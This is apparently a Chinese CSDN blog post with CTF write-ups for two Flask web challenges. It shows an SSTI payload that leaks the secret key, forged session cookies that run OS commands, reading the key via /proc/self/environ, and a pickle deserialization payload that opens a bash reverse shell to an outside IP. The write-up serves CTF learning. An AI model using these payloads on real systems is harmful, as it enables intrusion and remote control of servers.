Buu-Web两个记录

最新推荐文章于 2024-10-04 17:17:09 发布
最新推荐文章于 2024-10-04 17:17:09 发布
阅读量679 收藏 14
点赞数 14
分类专栏: CTF-Web 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79839194/article/details/142314101
版权
知识点
  • Cookie伪造 - 秘钥获取
题解

打开题目环境,给出计算式子,返回计算结果,发现只能输入运算符和数字,输入字母就会报错,随便尝试的时候,输入 1/0会报错,这里我并没有多想 看了wp说,通过这个报错来获取信息

1/0#{{7*7}}

尝试抓包,发现有Session数据,尝试对Session进行解密,我不知道为什么jwt.io网站解密不出来,用脚本解密

在这里插入图片描述

发现了Session里面保存的是计算的历史记录

那么思路就来了 -> 我们直接输入字母会遭检测 -> 通过直接伪造Session来输入

-> 伪造Session需要秘钥(有些可能无秘钥的Session加密)

-> 之前那个报错点,如果会的话 就会直接利用报错来作为突破点寻找秘钥了

-> 1/0#{{config}} ===> 获取秘钥

在这里插入图片描述

通过脚本,依据秘钥,编写执行语句(注意格式)-> 这里的双引号转义的原因我也不知道

python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history': [{'code': '__import__(\"os\").popen(\"ls\").read()'}]}"

得到编码之后的数据,F12在应用里面找到Cookie修改 刷新页面即可

在这里插入图片描述

python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history': [{'code': '__import__(\"os\").popen(\"cat flag.txt\").read()'}]}"

在这里插入图片描述

在这里插入图片描述

这里第一条命令我没加双引号,没成功运行,大概是混淆了 -t 的双引号吧

参考

wp

[HFCTF 2021 Final]easyflask

知识点
  • python反序列化
  • 伪造Session
题解

通过提示获取源码 url/file?file=

#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET_KEY"] = "*******"

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index_handler():
    if not session.get('u'):
        u = pickle.dumps(User()) # 序列化函数
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict): #
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'


if __name__ == '__main__':
    app.run('0.0.0.0', port=80, debug=False)

审计python代码,/file/admin两个路由 => 伪造admin是目标,通过session存储身份信息 经过了pickle序列化和base加密

-> /file路由可以获取key

通过路由/file?file=/proc/self/environ 获取key

在这里插入图片描述

glzjin22948575858jfjfjufirijidjitg3uiiuuh

-> python序列化构造反弹shell -> 利用秘钥生成Session伪造admin -> 访问路由/admin反弹

#在Linux的python2环境下运行
import os
import base64
import pickle

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 1,
    '__repr__': lambda o: o.uname,
    '__reduce__': lambda o: (os.system, ("bash -c 'bash -i >& /dev/tcp/114.55.129.236/4444 0>&1'",))
})

u = pickle.dumps(User())
print(base64.b64encode(u).decode())

在这里插入图片描述

访问/admin路由抓包,修改Session,提前监听端口,发包,成功反弹shell

在这里插入图片描述

参考

))


[外链图片转存中...(img-WaVMeS9G-1726552672555)]

访问`/admin`路由抓包,修改Session,提前监听端口,发包,成功反弹shell

[外链图片转存中...(img-68f0hQwL-1726552672555)]

#### 参考

https://blog.csdn.net/RABCDXB/article/details/120340573
Liqd
关注
专栏目录
BUU刷题记录WEB-1)
Martin-share的博客
11-21 496
[强网杯 2019]随便注 [GYCTF2020]Blacklist[极客大挑战 2019]PHP 序列化[网鼎杯 2020 青龙组]AreUSerialz[RoarCTF 2019]Easy Calc[护网杯 2018]easy_tornado SSTI[BJDCTF2020]The mystery of ip SSTI[极客大挑战 2022] Not_Stay [GXYCTF2019]BabySQli[CISCN2019 华北赛区 Day2 Web1]Hack World[RoarCTF 2019
buu——web
weixin_73668856的博客
11-29 427
新手web
2019-SUCTF-web记录
weixin_30376453的博客
08-22 391
1.web1-chkin 首先发现服务器中间件为nginx,并且fuzz上传过滤情况,是黑名单,带ph的全部不能上传切对文件内容中包含<?进行过滤,并且服务器对文件头有exif_type的判断,直接通过xbm格式绕过,传.htaccess和.user.ini是可以的,又因为此题为nginx,所以通过.user.ini结合文件夹中已经有的index.php使其包含上传的shell....
2021-07-01-Buu刷题-web-[第一章 web入门]常见的搜集 1
yundi的博客
07-01 1156
2021-07-01-Buu刷题-web-[第一章 web入门]常见的搜集 1 #1登进去后的界面 #2用dirsearch目录扫描工具对该网址进行扫描 (前一篇文章记录了再Windows环境下如何安装和使用dirsearch https://blog.csdn.net/weixin_45926847/article/details/118381764?spm=1001.2014.3001.5502 ) 敲命令 python dirsearch.py -u URL -i 200 扫描网址对应返回状态为2
buu-day07
anwen12的博客
01-05 477
新的一天从早起刷题开始 文章目录0x01 [NPUCTF2020]web????0x02[HCTF 2018]Hideandsee0x03 [MRCTF2020]Ezpop_Reveng0x04 [GKCTF 2021]babycat0x01 XMLDecoder/XMLEncoder概述0x02 xml简介0x03 xml反序列化源码分析 0x01 [NPUCTF2020]web???? include('config.php'); # $key,$flag define("METHOD", "ae
BUU WEB刷题记录1(持续更新)
Sapphire037的博客
05-19 1182
BUUCTF-web刷题记录-1
qq_45628145的博客
07-08 889
[GWCTF 2019]我有一个数据库 题目打开是个乱码,在robots.txt里面发现了phpinfo.php 扫目录发现phpmyadmin 访问并不需要账号密码,但是数据库里面也没有什么信息,但是4.8.1版本的phpmyadmin存在远程文件包含漏洞(CVE-2018-12613),通过?target=db_datadict.php?../xxx可以通过目录穿越包含任意文件,猜测flag在flag或flag.txt或flag.php文件里面,然后一级级的试就好了,最后的payload ?targ
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4875
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
Buu-第二届网鼎杯_玄武组web_ssrfme
Fisher
06-08 1202
<?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { $url_parse=parse_url($url); } catch
CTF之web学习记录 -- 环境和工具篇
lifanxin的博客
05-03 2416
工具篇引言本地web环境搭建安装apache安装PHP 引言   作为一名刚入坑二进制不久的新人选手,发现ctf的道路任重而道远,恍惚间又看到一些关于二进制求生之路上的劝退语录,于是为了提升综合素养,开始学习web方向。这里是我从零到一的学习记录,写博客的好处一来是夯实基础,巩固复习,二来是分享经验,希望新入坑的读者可以少走弯路。 本地web环境搭建 安装apache   这里介绍Ubuntu下apache环境的搭建以及一些常用的终端操作命令。 # 安装apache2 sudo apt install ap
攻防世界-web高手进阶区
zji
04-25 6580
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 820
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
网鼎杯2020青龙组-web
ChenZIDu的博客
05-18 954
看来反序列化要多打点了,反序列化这块都不怎么熟~ AreUSerialz 源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "
BUU [GWCTF 2019]我有一个数据库
cadandme的博客
05-11 226
刷了一道web题,记录做题过程。 打开页面看到 打开源码,尝试解码。试了UTF-8,尝试把得到的数据导成文档。 结果是乱码,走入了死胡同。数据库,数据库,又想到扫描目录,在kali扫描,发现东西 先看txt, 再看phpinfo.php 到这里彻底不懂了,瞎搞了没看出东西后,看了大佬的wp,说是phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 后面跟着wp来,可惜在构造Pyaload使用时显示 index.php?target=db_sql.php%253f/
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 504
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
端口隔离配置的实验
zhgjx_ywz的博客
09-28 789
LSW1-GigabitEthernet0/0/4]am isolate GigabitEthernet 0/0/5 // g0/0/4的报文不能发给g0/0/5,g0/0/5的报文可以发给g0/0/4。综上所述,端口隔离配置是一种有效的网络安全措施,可以在不增加VLAN资源消耗的情况下实现端口间的隔离和控制。在VLAN20中,PC4主机存在安全隐患,往其他主机发送大量的广播报文,通过配置接口间的单向隔离来实现其他主机对该主机报文的隔离。3、配置PC1、PC2、PC3、PC4、PC5。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 243
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1188
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值